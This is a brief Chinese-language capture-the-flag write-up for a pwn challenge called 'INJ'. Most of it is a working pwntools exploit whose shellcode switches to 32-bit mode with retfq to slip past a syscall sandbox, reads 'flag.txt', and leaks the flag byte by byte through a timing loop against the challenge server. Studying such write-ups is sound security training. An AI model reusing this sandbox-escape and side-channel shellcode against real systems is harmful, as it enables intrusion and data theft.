上去看的时候队里的其他师傅已经把PWN写的只剩一题了,然后就半摆烂地把PWN最后那道INJ写了,最后也是被队里的大佬们带飞拿了第一
1st place!
INJ
题目的沙箱
利用shellcode切换至32位进行ORB,需要注意的是远程open返回的文件描述符可能不是3,需要用 mov ebx, eax
来设置read的fd
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81
| from pwn import *
context.binary = 'inj'
sd = lambda x : io.send(x) sa = lambda a, b : io.sendafter(a, b)
def pwn(ch): global io global flag io = remote('35.233.85.116', 30020) code = ''' mov al, 0xa mov edi, 0x0000000000404000 mov esi, edi push 7 pop rdx syscall pop rdx mov esp, 0x00000000004043E0 pop rax push 0x80cd mov ecx, esp push 0x23 push rcx add al, 3 retfq ''' code = asm(code) sa('Welcome to my code executor!', code) code = ''' mov eax, 5 push 0 push 0x7478742e push 0x67616c66 mov ebx, esp mov ecx, 0 int 0x80 mov ebx, eax mov eax, 3 mov ecx, 0x00000000004045E0 mov edx, 0x50 int 0x80 push 0x33 push 0x404418 retfq loop: mov rsi, 0x4045e0 cmp byte ptr[rsi+{0}], {1} je loop ret '''.format(len(flag), ord(ch)) code = 'aa' + asm(code) sleep(1) sd(code) try: io.recv(timeout = 1) flag += ch io.close() return True except: io.close() return False
flag = '' table = 'abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}-_@$&*!?.' while True: if flag.endswith('}'): break for ch in table: sleep(0.25) info('current flag: ' + flag) info('trying(' + ch + ')') if pwn(ch): success('success(' + ch + ')') break success('final flag: ' + flag)
|